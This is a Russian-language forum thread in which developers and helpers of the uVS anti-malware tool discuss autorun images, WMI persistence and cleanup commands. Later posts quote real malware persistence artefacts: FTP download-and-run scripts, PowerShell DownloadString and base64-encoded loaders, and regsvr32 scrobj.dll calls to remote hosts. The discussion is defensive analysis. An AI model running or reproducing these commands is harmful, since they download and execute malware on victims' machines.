Перейти к содержанию

Recommended Posts

PR55.RP55

 Windows 10 Pro x64 (NT v10.0 SP0) build 15063  [C:\WINDOWS]

-----------------------

Полное имя                  {6\[CLSID]
Имя файла                   [CLSID]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Classes\Wow6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\{60BD49A6-240E-48ef-8D73-AC8244BE1D85}\CLSID
------------------------

Полное имя                  {E\[CLSID]
Имя файла                   [CLSID]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Ссылки на объект            
Ссылка                      HKLM\Software\Classes\Wow6432Node\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance\{EAC2F030-5937-414C-9B7A-6B57F7C072E8}\CLSID

------------------------

Тема\образ.

http://www.tehnari.ru/f35/t262097/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
7 часов назад, PR55.RP55 сказал:

{6\[CLSID]

содержимое ключа нужно, без него не починить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Такая вот история.

 

 

2018-12-13.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
33 минут назад, PR55.RP55 сказал:

Такая вот история.

и что не так?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
11 часов назад, demkd сказал:

и что не так? 

Почему  в списке два процесса uVS - ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
2 часа назад, PR55.RP55 сказал:

Почему  в списке два процесса uVS - ?

Windows 64-х битный потому и 2 процесса, один под эмулятором, второй 64-х битный.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
Цитата

Добавлена поддержка WMI классов на базе __TimerInstruction.

судя по свежему образу, видится запись в WMI

Полное имя                  WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\FUCKYOUMM2_ITIMER
Имя файла                   FUCKYOUMM2_ITIMER
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Class              __IntervalTimerInstruction
TimerId                     fuckyoumm2_itimer
IntervalBetweenEvents       10800000
SkipIfPassed                FALSE

                           

ANDREY-PC_2018-12-20_09-32-21_v4.1.2.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 21.12.2018 at 8:28 AM, santy сказал:

Добавлена поддержка WMI классов на базе __TimerInstruction.

И здесь:  http://www.tehnari.ru/f183/t262393/

Сразу две записи:

Полное имя                  WMI:\\.\ROOT\SUBSCRIPTION\__INTERVALTIMERINSTRUCTION\SETHOMEPAGE INTERVAL TIMER
Имя файла                   SETHOMEPAGE INTERVAL TIMER
Тек. статус                   в автозапуске
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Class              __IntervalTimerInstruction
TimerId                     SethomePage Interval Timer
IntervalBetweenEvents       900000
SkipIfPassed                FALSE

--------------------

+

.[EVENTFILTER SETHOMEPAGE2]

                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

А здесь...

Тема\образ: http://www.tehnari.ru/f35/t262401/

------------------

Записи:

FILE:///C:\PROGRAM FILES (X86)\HEWLETT-PACKARD\HP SUPPORT SOLUTIONS\MODULES\ACLMCONTROL.EXE

C:\PROGRAM FILES (X86)\HEWLETT-PACKARD\HP SUPPORT SOLUTIONS\MODULES\ACLMCONTROL.EXE

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Тема: http://www.tehnari.ru/f35/t262401/

uVS  видит запись: 

Ссылка                      HKEY_USERS\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vladislav
Vladislav                   cmd.exe /c start www.dipladoks.org

------------
Но в автоскрипте не будет нормального удаления.

По хорошему не должно быть никаких дополнительных команд.

Только:  delref

Если команда отдана - то автоматически удаляются и всё задачи где есть запись: www.dipladoks.org

И всё, что есть в автозапуске по:   www.dipladoks.org  и т.д.

 

 

 

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
8 часов назад, PR55.RP55 сказал:

Но в автоскрипте не будет нормального удаления.

по этому образу в автоскрипте будут две команды:

delref HTTP://WWW.DIPLADOKS.ORG/
delref WWW.DIPLADOKS.ORG

вторая команда должна зачистить все ссылки и задачи, которые приведены в этом объекте

 

Цитата

Полное имя                  WWW.DIPLADOKS.ORG
Имя файла                   WWW.DIPLADOKS.ORG
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Удовлетворяет критериям     
RUN                         (ССЫЛКА ~ \CURRENTVERSION\RUN\)(1)   AND   (ЦИФР. ПОДПИСЬ !~ ДЕЙСТВИТЕЛЬНА)(1) [auto (0)]
RUN.CMD                     (ССЫЛКА ~ \CURRENTVERSION\RUN\)(1)   AND   ( ~ CMD.EXE)(1) [auto (0)]
KB-RIBAKI.ORG               ( ~ REG ADD)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CMD.EXE
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\VLADISLAV
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A3E456D9-DFF9-4644-90AD-00597EAAA099}\Actions
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{A3E456D9-DFF9-4644-90AD-00597EAAA099}\
                            
Ссылка                      HKEY_USERS\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Vladislav
Vladislav                   cmd.exe /c start www.dipladoks.org


                            

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 08.01.2019 at 8:32 AM, santy сказал:

вторая команда должна зачистить все ссылки и задачи, которые приведены в этом объекте

Может и должна.

В теме были применены две команды:

deltsk WWW.DIPLADOKS.ORG

delref HTTP://WWW.DIPLADOKS.ORG/

Но, как мы видим в FRST после этого осталась запись:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

--------------

"HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Vladislav" => removed successfully

------

Цитата

 4.0.21
---------------------------------------------------------
o Добавлена возможность удалять события WMI и задачи без удаления всех ссылок на файл/объект.
Скриптовые команды: delwmi и deltsk

Исходя из этой логики команда: deltsk  не удаляет ссылки.

В 07.01.2019 at 11:48 PM, PR55.RP55 сказал:

По хорошему не должно быть никаких дополнительных команд.

Только:  delref

Если команда отдана - то автоматически удаляются и всё задачи где есть запись: www.dipladoks.org

И всё, что есть в автозапуске по:   www.dipladoks.org  и т.д.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

если deltsk будет удалять и задачи, связанные с данным объектом и все ссылки в реестре на объект, тогда зачем нужен дубль команды, когда все это умеет делать delref.

значит, эта команда (deltsk) введена для того чтобы удалить только задачи, связанные с объектом автозапуска. Например, сам объект автозапуска может быть даже с белой цифровой записью и содержит ряд полезных ссылок в реестре, которые необходимы для функционирования системы, но в тоже время может быть использован через левую задачу для деструктивных действий. Поэтому, в данном случае мы не можем применить delref к объекту, а только deltsk. (Очевидно, при этом будут удалены все задачи, связанные с данным объектом). Если необходимо удалить связанные с объектом задачи  поштучно, в этом случае можно использовать контекстное удаление из info, например: del %Sys32%\TASKS\VLADISLAV, del %Sys32%\TASKS\VLADISLAV1, del %Sys32%\TASKS\VLADISLAV2

 

команда deltsk WWW.DIPLADOKS.ORG скорее всего была применена без внимания, что в автозапуске остался еще запуск по данной ссылке через ключ реестра.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

santy

Я говорю об удалении не всего, а только самой записи: www.dipladoks.org

т.е. удаляется фрагмент\часть при 100% совпадении\соответствии.

В данном случае удалению подлежит:  www.dipladoks.org

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

В итоге получим:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start

-----------

И в конце скрипта у нас идёт команда на удаление ссылок... удаляем отсутствующие объекты.

Что уже давно проверено и безопасно и не будет затрагивать полезные ссылки в реестре.

-----------

Проблема в том, что оператор не видит всей картины.

Если бы была возможность создать поисковый запрос по всему Инфо.

тогда оператор бы увидел все записи в _одном окне:

Цитата

Полное имя                  HTTP://WWW.DIPLADOKS.ORG/
Имя файла                   HTTP://WWW.DIPLADOKS.ORG/
CmdLine                     "C:\Program Files (x86)\Opera\57.0.3098.106\opera.exe" -noautoupdate --ran-launcher -- http://www.dipladoks.org/

 


Полное имя                  WWW.DIPLADOKS.ORG
Имя файла                   WWW.DIPLADOKS.ORG
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Vladislav                   cmd.exe /c start www.dipladoks.org


CmdLine                     "C:\Program Files (x86)\Opera\57.0.3098.106\opera.exe" -noautoupdate --ran-launcher -- http://www.dipladoks.org/

 


CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
CmdLine                     /C REG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /F /V VLADISLAV /T REG_SZ /D "CMD.EXE /C START WWW.DIPLADOKS.ORG"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Actions                     "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Vladislav /t REG_SZ /d "cmd.exe /c start www.dipladoks.org"
Vladislav                   cmd.exe /c start www.dipladoks.org

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

RP55,

ничто не мешает оператору заглянуть внутрь инфо подозрительных объектов чтобы определиться какой командой лучше его зачистить из системы. или delall, или delref, или deltsk или достаточно просто использовать del,

достаточно при этом использовать фильтрующее выражение и обе записи окажутся рядом.
 

Цитата

 

Если бы была возможность создать поисковый запрос по всему Инфо.

тогда оператор бы увидел все записи в _одном окне:

 

а вот каша из строк инфо, которые принадлежат разным объектам не нужна.

отсутствие привязки этих строк к реальному объекту автозапуска из списка только затруднит выбор команды.

скажем, тот же объект в cmdline может быть запущен из lnk файла, и вместо очистки командной строки в ярлыках будет запущено удаление ярлыков.

---------

внутри info возможно фильтр не помешал бы, в тех случаях, когда на странице info большой объем информации задан

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
В 08.01.2019 at 4:29 PM, santy сказал:

каша из строк инфо, которые принадлежат разным объектам не нужна.

Что мешает создать переход к нужному объекту ?

Выполнили поиск > посмотрели информацию > переход к нужному объекту и на месте приняли решение.

Или создать суммирующее окно Инфо. где будут все объекты и все ссылки удовлетворяющие запросу.

С выделением результата поиска.

В 08.01.2019 at 4:29 PM, santy сказал:

внутри info возможно фильтр не помешал бы, в тех случаях, когда на странице info большой объем информации задан

Давно нужно сделать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
В 08.01.2019 at 5:52 PM, PR55.RP55 сказал:

santy

Я говорю об удалении не всего, а только самой записи: www.dipladoks.org

т.е. удаляется фрагмент\часть при 100% совпадении\соответствии.

В данном случае удалению подлежит:  www.dipladoks.org

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start www.dipladoks.org

В итоге получим:

HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start

-----------

И в конце скрипта у нас идёт команда на удаление ссылок... удаляем отсутствующие объекты.

Что уже давно проверено и безопасно и не будет затрагивать полезные ссылки в реестре.

ну, в данной строке HKU\S-1-5-21-3928128571-3472622639-2727322988-1000\...\Run: [Vladislav] => cmd.exe /c start есть объекты, которые присутствуют в системе, поэтому вряд ли эта строка попадет под удаление отсутствующих объектов. в итоге, у юзера будет все время впустую стартовать cmd.exe, или браузер, или запускаться командное окно и .т.п.

Частичное исправление параметров (без удаления ключа), если необходимо, решается сейчас твиками. например: regt 12

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

santy

Мне кажется, что идея с удалением фрагмента\части интересная.

Единственно нужен такой метод при котором операция не будет приводить к негативным последствиям в виде старта cmd.exe, браузера, командных окон и т.д.

твик regt 12 - команда возвращает запись в исходное значение...

Значит сопоставив две записи:

1) Запись модифицированная

2) Исходная запись - которая сейчас содержится в твике.

3) Получаем разницу.

4) Эту разницу программа и обрабатывает.

-----------

Нужен банк\база стандартных\регулярных исходных значений и отталкиваясь от этого и обработать объект.

8 часов назад, santy сказал:

будет все время впустую стартовать cmd.exe, или браузер, или запускаться командное окно и .т.п.

Или выявлять и удалять эти пустые\битые элементы. Что вроде бы и так реализовано.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
13 минут назад, PR55.RP55 сказал:

Мне кажется, что идея с удалением фрагмента\части интересная.

может и интересная,

но в данном случае идея с очисткой ссылок и задач, реализованная в программе работает.

командная строка (cmdline), которая может содержать чистые файлы (cmd.exe, wmic.exe, regsvr32.exe, explorer.exe и т.д., через которые могут быть выполнены деструктивные действия), разбивается на отдельные элементы списка автозапуска, и каждый элемент, который был выделен из командной строки, содержит всю инфо, из которой он был выделен. Т.о. если применяется delref к этим элементам, то удаляются из реестра или из tasks все параметры, ключи и actions запуска деструктивного действия.

При этом, сам чистый файл не затрагивается,  не удаляется, а удаляется только его деструктивное применение, прописанное через задачи, или ключи реестра.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай.

;uVS v4.1.2 [http://dsrt.dyndns.org] [Windows 6.1.7601 SP1 Service Pack 1]
; WMI: обработчики событий

Цитата

 

ПОДОЗРИТ.  | хттп]://173.208.139.170/2.TXT
ПОДОЗРИТ.  | хттп://35.182.171.137/3.TXT
ПОДОЗРИТ.  | хттп://WMI.1217BYE.HOST/1.TXT
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://173.208.139.170/S.TXT')&POWERSHELL.EXE
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://35.182.171.137/S.JPG')||REGSVR32
ПОДОЗРИТ.  | SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('хттп://WMI.1217BYE.HOST/S.PS1')&POWERSHELL.EXE
автозапуск | &POWERSHELL.EXE
автозапуск | C:\WINDOWS\SYSTEM32\CSCRIPT.EXE
автозапуск | KERNCAP.VBS
автозапуск | WMI:\\.\ROOT\SUBSCRIPTION\NTEVENTLOGEVENTCONSUMER\SCM EVENT LOG CONSUMER.[SCM EVENT LOG FILTER]
автозапуск | C:\WINDOWS\SYSTEM32\SCROBJ.DLL


 

 

АЛЕКСЕЙ-HP_2019-01-11_21-19-41_v4.1.2.7z

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
1 час назад, santy сказал:

а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай.

разобрать все многообразие командных строк просто невозможно, мусор всегда будет

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

похоже, какой-то новый подход используется, с комбинированием base64 и реального кода.

consumer_name fuckyoumm4 и consumer_filter fuckyoumm3 засветились в инфо cmd.exe

 

Цитата

 

Полное имя                  C:\WINDOWS\SYSTEM32\CMD.EXE
Имя файла                   CMD.EXE
Тек. статус                 АКТИВНЫЙ ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
                            
Удовлетворяет критериям     
WMI_ACTIVESCRIPTEVENTCONSUMER.LIST(CONSUMER_NAME ~ FUCKYOUMM)(1) [delall (0)]
TASK.MUSA                   (ССЫЛКА ~ TASKS\MYSA)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      АКТИВНЫЙ ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
Процесс                     64-х битный
File_Id                     4CE798E559000
Linker                      9.0
Размер                      345088 байт
Создан                      21.11.2010 в 06:23:55
Изменен                     21.11.2010 в 06:23:55
                            
TimeStamp                   20.11.2010 в 09:46:13
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            Cmd.Exe.MUI
Версия файла                6.1.7601.17514 (win7sp1_rtm.101119-1850)
Описание                    Обработчик команд Windows
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
pid = 1708                  Алексей-HP\Алексей
CmdLine                     "C:\Windows\System32\cmd.exe" /c "color 17 & title AutorunsVTchecker & "C:\Users\CD86~1\AppData\Local\Temp\7ZipSfx.000\autorunsc64.exe" -accepteula -a * -vt -vs"
Процесс создан              21:17:13 [2019.01.11]
С момента создания          00:02:35
CPU                         0,01%
CPU (1 core)                0,01%
parentid = 3136             
pid = 1900                  NT AUTHORITY\система
CmdLine                     C:\Windows\system32\cmd.EXE /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
Процесс создан              21:06:50 [2019.01.11]
С момента создания          00:12:58
CPU                         0,00%
CPU (1 core)                0,00%
parentid = 1620             C:\WINDOWS\SYSTEM32\TASKENG.EXE
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>S&ECHO TEST>>S&ECHO 1433>>S&ECHO BINARY>>S&ECHO GET A.EXE C:\WINDOWS\UPDATE.EXE>>S&ECHO BYE>>S&FTP -S:S&C:\WINDOWS\UPDATE.EXE
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>P&ECHO TEST>>P&ECHO 1433>>P&ECHO GET S.DAT C:\WINDOWS\DEBUG\ITEM.DAT>>P&ECHO BYE>>P&FTP -S:P
CmdLine                     /C ECHO OPEN FTP.1226BYE.XYZ>PS&ECHO TEST>>PS&ECHO 1433>>PS&ECHO GET S.RAR C:\WINDOWS\HELP\LSMOSEE.EXE>>PS&ECHO BYE>>PS&FTP -S:PS&C:\WINDOWS\HELP\LSMOSEE.EXE
SHA1                        0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8
MD5                         5746BD7E255DD6A8AFA06F7C42C1BA41
                            
Namespace                   \\.\root\subscription
Consumer_Name               fuckyoumm4
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplatecmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll
Filter_Name                 fuckyoumm3
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"fuckyoumm4\"";
    Filter = "__EventFilter.Name=\"fuckyoumm3\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "fuckyoumm3";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
    QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
    CommandLineTemplate = "cmd /c powershell.exe -nop -enc \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll";
    Name = "fuckyoumm4";
};

                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA
                            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA2
                            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MYSA3
                           

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
26 минут назад, santy сказал:

похоже, какой-то новый подход используется, с комбинированием base64 и реального кода.

в принципе ничего нового, просто затрудняет машинный анализ вот и все, возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
42 минут назад, demkd сказал:

возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять

а что здесь означает ключ -enc? закодированный объект?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • Ego Dekker
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • PR55.RP55
      .xml  файлы taskschd.msc Могут быть подписаны  цифровой подписью. Думаю будет нелишним, если uVS будет это фиксировать. т.е. проверять не только подпись целевого файла, но и подпись самого файла\задачи. и писать в ИНфО .  
    • demkd
      ---------------------------------------------------------
       4.15.2
      ---------------------------------------------------------
       o Исправлена ошибка при работе с образом автозапуска.
         Для некоторых процессов команда unload не добавлялась в скрипт при нажатии кнопки "принять изменения".  o Добавлена плашка окна на таскбаре для окна удаленного рабочего стола.
         (при работе с удаленной системой) -----------------------------------------------------------
      Есть проблема с локализацией глюка в редких случаях приводящему к аварийному завершению uVS при активном флаге "Проверять весь HKCR".
      На основе дампов его найти не получается, нужна копия реестра системы с такой проблемой, если кому-то попадется такая проблема, то присылайте архив с копией реестра системы мне на почту.  
×